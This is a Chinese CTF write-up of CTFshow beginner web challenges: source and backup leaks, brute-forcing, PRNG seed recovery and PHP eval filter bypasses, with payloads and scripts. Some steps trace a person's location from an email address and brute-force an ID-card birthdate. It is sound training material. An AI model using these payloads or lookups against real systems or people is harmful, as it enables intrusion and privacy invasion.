这些题目存放在CTFshow平台下一个专门的分类目录WEB入门内,主要面向于刚入门的WEB萌新的学习。
题目有点多,慢慢搞
2020.9.27更新:
渐渐也有了自己不会的题目,网上还没有全的writeup,着实难顶。
信息收集
web1
题目
开发注释未及时删除
解决方案
看网页源代码拿flag
web2
题目
js前台拦截 === 无效操作
解决方案
同上,快捷键看源代码即可。
web3
题目
没思路的时候抓个包看看,可能会有意外收获
解决方案
文件头有flag
有点傻逼,我还对着Cookie干瞪眼
web4
题目
总有人把后台地址写入robots,帮黑阔大佬们引路。
解决方案
robots.txt的文件泄露
web5
题目
phps源码泄露有时候能帮上忙
解决方案
访问index.phps源码泄露。
web6
题目
解压源码到当前目录,测试正常,收工
解决方案
www.zip压缩包源码泄露,访问/fl000g.txt拿到flag
由于是动态flag生成,下载下来的压缩包里的fl000g.txt是不能直接使用的。
web7
题目
版本控制很重要,但不要部署到生产环境更重要。
解决方案
版本控制想到git泄露,访问/.git。
web8
题目
版本控制很重要,但不要部署到生产环境更重要。
解决方案
访问./svn获得flag。
web9
题目
发现网页有个错别字?赶紧在生产环境vim改下,不好,死机了
解决方案
index.php.swp文件泄露
web10
题目
cookie 只是一块饼干,不能存放任何隐私数据
解决方案
cookie拿flag
web11
题目
域名其实也可以隐藏信息,比如ctfshow.com 就隐藏了一条信息
解决方案
域名解析记录查询
web12
题目
有时候网站上的公开信息,就是管理员常用密码
解决方案
直接访问/admin/看后台
沙雕题,以为是要找到网页模板去搜弱密码,结果直接拿网页上的Help Line Number 就出了,谁把密码写网页上啊
web13
题目
技术文档里面不要出现敏感信息,部署到生产环境后及时修改默认密码
解决方案
文档泄露信息,在F12找到document.pdf,提示的默认后台通过默认账号密码登录。
web14
题目
小0day:某编辑器最新版默认配置下,如果目录不存在,则会遍历服务器根目录
有时候源码里面就能不经意间泄露重要(editor)的信息,默认配置害死人
解决方案
看源码发现有editor目录,访问后发现有编辑器,通过上传附件访问整个服务器,访问/nothinghere/fl000g.txt找到flag。
web15
题目
公开的信息比如邮箱,可能造成信息泄露,产生严重后果
解决方案
进入后台/admin,用用户名1156631961@qq.com找回密码,通过QQ找到居住地址陕西西安,重新登录获得flag。
web16
题目
对于测试用的探针,使用完毕后要及时删除,可能会造成信息泄露
解决方案
这东西着实以前没见过,访问/tz.php,为WEB端的探针,访问phpinfo找flag即可。
web17
题目
透过重重缓存,查找到ctfer.com的真实IP,提交 flag{IP地址}
解决方案
垃圾题
还要积分查询
一个个试,最后在上海找到了
web18
题目
不要着急,休息,休息一会儿,玩101分给你flag
解决方案
看源码,找到js文件,找到当分数大于100的if语句:
if(score>100) {
var result=window.confirm("\u4f60\u8d62\u4e86\uff0c\u53bb\u5e7a\u5e7a\u96f6\u70b9\u76ae\u7231\u5403\u76ae\u770b\u770b");
} else {
var result=window.confirm("GAMEOVER\n是否重新开始");
}
该编码为Unicode编码,转码可得:
中文一百级选手?迷惑性中文……
访问110.php拿到flag。
web19
题目
密钥什么的,就不要放在前端了
解决方案
题目源码给出答案的用户名和密码,但是前端有一系列的加密步骤
burp抓包绕过前端验证拿flag
题目
做为信息泄露的最后一题,还有其他没有涉及到的地方,欢迎联系群主补充
mdb文件是早期asp+access构架的数据库文件,文件泄露相当于数据库被脱裤了。
解决方案
搁着考古呢……
试了几个常用的文件名,发现没有,于是开了御剑爆破也没有
(后来py了一下出题人)访问db/db.mdb获得flag。
爆破
web21
题目
爆破什么的,都是基操
解决方案
题目给了压缩包,结合提示应该是爆破题目。
随机输入值,抓包后发现 Authorization 参数为用户名:密码格式的base64编码后的字符串,将 Payload type 设置为 Custom iterator,设置好三个Position,加密方式为 base64,取消掉提交的转义。
找到flag:
web22
题目
域名也可以爆破的,试试爆破这个ctfer.com 的子域名
解决方案
直接盲猜 flag.ctfer.com 就没爆破了
web23
题目
还爆破?这么多代码,告辞!
解决方案
题目提示了爆破,写个脚本爆破,由于不知道几位数,先从两位数试,运气好就出了:
<?php
error_reporting(0);
$string = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
for ($i1 = 0; $i1 < 62; $i1++) {
for ($i2 = 0; $i2 < 62; $i2++) {
$exp = $string[$i1] . $string[$i2];
$token = md5($exp);
if (substr($token, 1, 1) === substr($token, 14, 1) && substr($token, 14, 1) === substr($token, 17, 1)) {
if ((intval(substr($token, 1, 1)) + intval(substr($token, 14, 1)) + substr($token, 17, 1)) / substr($token, 1, 1) === intval(substr($token, 31, 1))) {
echo $exp . "\n";
echo 'flag';
}
}
}
}
直接出了两个,解还是挺多的。
web24
题目
爆个?
解决方案
利用到了伪随机数的特性,在种子确定时,随机数的值是确定的。
<?php
mt_srand(372619038);
echo mt_rand();
?>
payload:
?r=1155388967
web25
题目
爆个?,不爆了
解决方案
上源码:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 13:56:57
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-03 15:47:33
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
$r = $_GET['r'];
mt_srand(hexdec(substr(md5($flag), 0,8)));
$rand = intval($r)-intval(mt_rand());
if((!$rand)){
if($_COOKIE['token']==(mt_rand()+mt_rand())){
echo $flag;
}
}else{
echo $rand;
}
}else{
highlight_file(__FILE__);
echo system('cat /proc/version');
}
逻辑很清晰,首先输入 r=0
,求出第一次mt_rand()值(由于flag随机,每次容器启动,答案都是不一样的)
-1504369762
提交 r=628900174
,就可以绕过第一个过滤了。
接下来要求出在这个seed下再算出两次mt_rand(),种子是flag md5加密后的前八位,写个垃圾脚本爆破:
<?php
$string = "0123456789abcdef";
$exp = 0;
for ($i1 = 0; $i1 < 16; $i1++) {
for ($i2 = 0; $i2 < 16; $i2++) {
for ($i3 = 0; $i3 < 16; $i3++) {
for ($i4 = 0; $i4 < 16; $i4++) {
echo $exp . "\n";
for ($i5 = 0; $i5 < 16; $i5++) {
for ($i6 = 0; $i6 < 16; $i6++) {
for ($i7 = 0; $i7 < 16; $i7++) {
for ($i8 = 0; $i8 < 16; $i8++) {
$exp = $string[$i1] . $string[$i2] . $string[$i3] . $string[$i4] . $string[$i5] . $string[$i6] . $string[$i7] . $string[$i8];
mt_srand(hexdec($exp));
if (mt_rand() == 1504369762) {
echo 'answer is ' . $exp;
exit();
}
}
}
}
}
}
}
}
}
脚本写的很垃圾,跑的也很久,因为不知道PHP多线程怎么写,于是写了四个exp,$i1的初始值分别设成0/4/8/12,算是缩短了四倍的时间,最后出了seed。
然后跑出token值:
提交就行
web26
题目
这个可以爆
解决方案
老渣男了,这题爆个锤子。
查看源码有个check()
函数:
function check() {
$.ajax({
url: 'checkdb.php',
type: 'POST',
dataType: 'json',
data: {
'a': $('#a').val(),
'p': $('#p').val(),
'd': $('#d').val(),
'u': $('#u').val(),
'pass': $('#pass').val()
},
success: function (data) {
alert(data['msg']);
},
error: function (data) {
alert(data['msg']);
}
});
}
尝试POST后返回json文件,抓包既得。
至于这题为啥这么少解,感觉不科学。
web27
题目
CTFshow菜鸡学院招生啦!
解决方案
进来是ZFsoft正方教务系统,起先想的是这个系统的登录有没有弱密码,后来没有找到后台,发现POST参数提交的时候没有用户的类型,且没有找到root的默认密码,就没有搞这个洞。
然后发现录取名单是可以下载的。下载下来的名单有八位打码:
然后有个学员录取查询系统,输入学生的身份证和姓名,结合刚才的表格,推测这里需要爆破。
身份证打码的位置比较微妙,是身份证的年月日,使得爆破难度大幅度下降,本来是十的八次方,现在只要一万多次。爆一下这位高先伊同学的身份证。
由于生日就在1990,所以很快就出了
提交之后给了初始密码和用户名,直接登录就拿到flag了。
web28(unsolved)
题目
大海捞针
解决方案
估计是有关302跳转的考点,目前没有思路,等以后再说吧。
命令执行
web29
题目
命令执行,需要严格的过滤
解决方案
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
用”绕过过滤
echo `nl fl''ag.php`;
或者直接再起一个变量绕过关键词过滤:
/?c=system($_GET['a']);&a=nl flag.php;
web30
题目
命令执行,需要严格的过滤
解决方案
源码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
用”绕过过滤
echo `nl fl''ag.p''hp`;
或者同上,老套娃了。
?c=eval($_GET[a])?>&a=system('cat flag.php');
web31
题目
命令执行,需要严格的过滤
解决方案
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
同上题
?c=eval($_GET[a])?>&a=system('cat flag.php');
还看到了很多奇怪的姿势:
show_source(next(array_reverse(scandir(pos(localeconv())))));
web32
题目
命令执行,需要经过严格的过滤。
解决方案
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
22题提交不对啊
你是不是直接提交了?我测试是可以的,你要先访问flag.ctfer.com,网站里面是flag